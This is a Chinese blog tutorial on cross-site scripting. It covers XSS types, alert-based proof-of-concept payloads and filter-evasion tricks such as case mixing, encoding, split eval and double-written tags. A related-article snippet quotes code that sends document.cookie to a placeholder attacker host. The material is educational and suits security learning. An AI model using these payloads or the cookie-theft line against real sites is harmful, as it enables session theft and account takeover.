浅谈XSS

最新推荐文章于 2024-08-18 19:04:11 发布
最新推荐文章于 2024-08-18 19:04:11 发布
阅读量633 收藏
点赞数 1
分类专栏: web 文章标签: js css web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lhix_/article/details/109855760
版权

XSS基础

XSS的基本概念

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。xss是一种发生在web前端的漏洞,所以其危害的对象也主要是前端用户。

漏洞原因

(或者说是XSS原理)当动态页面中插入的内容含有这些特殊字符时,正好你要访问的服务器并没有对用户的输入进行安全方面的验证,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞。

验证XSS漏洞存在

POC:漏洞的验证和检测。
验证XSS漏洞的POC如下:

<script>alert(xss)</script>       常用
<script>confirm(xss)</script>
<script>prompt(xss)</script>

反射型XSS

XSS代码提交到服务端,服务器解析后,在响应内容中返回输入的XSS代码,最终由浏览器解释执行。

存储型XSS

攻击者提交XSS代码后,服务器会将其储存于数据库中,其他用户访问后,服务器将含有XSS代码的数据输出在HTTP响应中。

DOM型XSS

较为特殊:构造的XSS代码在浏览器本地修改DOM树而执行,并不会传到服务器上,所以更难解决。如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本,而这些脚本没有经过适当的过滤和消毒,那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。

构造XSS代码

1.利用<>构造HTML标签和

<a href="javascript:alert(xss)">touch me!</a>

点击超链接即可触发XSS。
也可以使用img标签的伪协议,这种方法只在IE6下测试成功

<img src="javascript:alert(xss)">

3.事件驱动

事件解释
Keyboard事件键盘按键触发的事件
Mouse事件由鼠标或类似用户动作触发的事件
Form事件对HTML表单动作触发的事件
Windows事件对windows对象触发的事件

例:

<img src=./hello.jpg’ onmouseover='alert(xss)'>

这个标签会引入一个图片,然后鼠标悬停在图片上的时候,会触发XSS代码。

<input type="button" onclick="alert(xss)">

点击按钮,会触发XSS代码

<img src='#' onerror='alert(xss)'>

图片发生错误时,会触发XSS代码

其他标签及手法:

<svg onload="alert(xss)">
<input onfocus='alert(xss)' autofocus>

大家可以自行探索会发生的情况。

XSS变换

1.大小写转换:
例:<iMg sRc='#' Onerror="alert(xss)"/>
<a hREf="javascript:alert(xss)">click me</a>
2.引号的使用

HTML对引号不敏感,但是某些过滤函数对引号敏感。

<img src="#" onerror="alert(xss)"/>
<img src='#' onerror='alert(xss)'/>
<img src=# onerror=alert(xss)/>
3.用/代替空格
例:<img/src='#'/onerror='alert(xss)'/>
4.在一些地方添加tab(水平制表符)和回车符,来绕过关键字的检测
<img src='#' onerror='alert(xss)'	/>
<a href="javas
cript:alert(xss)">click me</a>
5.对标签属性进行编码
字母ascii码十进制编码十六进制编码
a97aa
e101ee
字母十六进制编码
Tab&#9
换行符&#10
回车符&#13
6.拆分跨站
<script>z='alert'</script>
<script>z=z+'(xss)'</script>
<script>eval(z)</script>
7.双写绕过
<scr<script>ipt>
8.远程运用shellcode

远程利用JS:将JS代码单独放在一个JS文件中,然后通过HTTP协议加载。

例:<script src="http://192.168.1.0/xss_test/xss.js"></script>

Xss.js的内容如下:alert(‘xss.js’);

结语

一个小白对xss漏洞的一点点小理解,希望大家能够有所收获。如有错误,欢迎大家赐教。

lhix_
关注
专栏目录
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
03-04
1.什么是XSS2.XSS攻击手段和目的3.XSS的防范4.新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将...
防止 常见几种网络攻击 【CSRF】【xss】【sql注入】
DuTianTian_csdn的博客
06-26 1036
xss  跨站脚本攻击XSS攻击Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击实施XSS攻击需要具备两个条件:一、需要web页面注入恶意代码;二、这些恶意代码能够被浏览器成功的执行。解决方法::一、是在表单提交或者url参数传递前,对需要的参数进行过滤,请看如下XSS过滤工具类代码二、 过滤用户输入的 检查用户输入的...
预防XSS攻击,(参数/响应值)特殊字符过滤
weixin_34200628的博客
12-17 1567
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phi...
XSS-过滤特殊符号的正则绕过
最新发布
ningwangh的博客
08-18 1273
所以将alert转化成30进制。
xss过滤总结
weixin_42109829的博客
12-04 3433
一。简述 一。简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序. 例如: 1.盗用cookie,获取敏感信息。 2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。 3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
Xss漏洞常见绕过过滤攻击场景
chaottop的博客
05-04 2409
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
利用简单的过滤过滤特殊字符实现 防止XSS攻击
梦想起飞的地方.........
03-12 5242
利用简单的过滤过滤特殊字符实现 防止XSS攻击 web.xml配置文件  [html] view plain copy print?  filter>    filter-name>XSSFilterfilter-name>    filter-class>com.neusoft.common.filter.XSSFilterfil
浅谈Vue的基本应用
11-29
本文将浅谈Vue的基本应用,主要涉及`$mount`方法、`created`生命周期钩子以及`v-text`指令的使用。 1. `$mount`方法:在Vue实例化时,我们通常会使用`new Vue({ el: '#app' })`来挂载Vue实例到HTML元素。然而,有...
Web_安全架构浅谈.pdf
01-02
在《Web安全架构浅谈》中,主要讨论了Web安全的多个方面,包括安全架构、扫描器、WAF(Web应用防火墙)以及面临的挑战和解决方案。以下是详细的知识点解析: 1. **Web安全扫描器**: - 扫描器用于检测Web应用中的...
浅谈golang的http cookie用法
09-20
- **HttpOnly**: 如果设置为`true`,那么此Cookie只能通过HTTP协议读取,而无法通过如JavaScript等方式获取,从而有效防止了跨站脚本攻击(XSS)。 - **Secure**: 如果设置为`true`,那么此Cookie只能通过HTTPS协议...
浅谈struts2安全
01-09
5. **视图层的安全问题**:Struts2的视图层通常是JSP页面,XSS(跨站脚本攻击)和CSRF(跨站请求伪造)是常见的视图层安全威胁。开发者应确保在展示用户数据时进行适当的转义和验证,防止XSS攻击,并在需要的地方...
漏洞警告:SpringBoot 该如何预防 XSS 攻击 ?
码猿技术专栏
10-28 314
大家好,我是不才陈某~XSS 漏洞到底是什么?在前端Form表单的输入框中,用户没有正常输入,而是输入了一段代码:</input><img src=1 onerror=alert1> 这个正常保存没有问题。问题出在了列表查询的时候,上面的代码就生效了,由于图片的地址乱写的,所以这个alert就起作用了来看图。那根据这个原理,实际上如果没有做任何的限制,有心人就可以为所欲为了...
XSS攻击一些常用防范方法
hzp
04-24 1075
过滤”&lt;”和”&gt;”标记XSS跨站攻击的最终目标是引入script代码在用户的浏览器中执行,所以最基本最简单的过滤方法,就是转换”&lt;”和’&gt;”标记。replace(str, "&lt;", "&lt;")replace(str, "&gt;", "&gt;") HTML属性过滤使用上述的代码可以过滤掉”&lt
XSS下的绕过过滤方法
xjh101010的专栏
05-25 9584
http://www.2cto.com/article/200904/37539.html 很久没有写过文章了,今天写一篇小品文,仍然是关于XSS下的利用。 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦就会转换成“<script src=1.js></scrip
用正则过滤敏感字符来解决XSS
戴眼镜的盲人键盘手
01-06 1万+
今天系统出了一个漏洞,XSS(跨站脚本攻击),系统中的表单提交时填写特殊字符,会报错,影响系统的稳定性。 漏洞描述: 在一个表单文本框中写"><script>alert(/xsstest/)</script> 提交表单时,会把文本中的字符当做script 代码解析出来。这个漏洞可用于钓鱼攻击或者窃取用户cookie。从而登录他人账户。所以要对用户输入的信息进行处理,来解决这个问题
XSS攻击绕过过滤方法大全(转)
热门推荐
mingyqf的博客
04-20 2万+
XSS攻击绕过过滤方法大全(约100种) 虽然说很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS注入。 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录,现在此XSS备忘录将由OWASP维护和完善它。 OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat She
xss】攻击
qq_32265719的博客
10-15 235
xss sql注入攻击服务器和数据库 Click劫持 相对链接劫持 // js 层面 xss 攻击代码 列如 var i=document.createElement("img"); document.body.appendChild(i); i.src = "http://www.hackerserver.com/?c=" + document.cookie; 方案 1...
一篇文章搞懂XSS跨站脚本攻击
s40d1's Blog
07-24 644
文章目录0x00 XSS跨站脚本概要1、什么是XSS跨站脚本漏洞?2、XSS攻击流程3、恶意脚本的形式4、XSS危害检验概括0x01 XSS跨站脚本分类1、反射型XSS1.1反射型XSS概述1.2反射型XSS的流程2、存储型XSS2.1 存储型XSS概述2.2存储型XSS攻击流程DOM型XSS0x02 检测XSS漏洞1、手工检测2、工具检测3、检测思路0x03 漏洞利用**演示视频传送门**0x04 漏洞防御 0x00 XSS跨站脚本概要 1、什么是XSS跨站脚本漏洞? XSS跨站脚本(Cross-Site
xss绕过字符过滤_xss绕过过滤方法
weixin_39654848的博客
12-21 958
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的输入没有构成<&...
XSS攻击应急响应策略
"XSS应急预案已完成" XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况,使得恶意代码能够注入到网页中,并在其他用户加载页面时执行。这些攻击可能导致...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值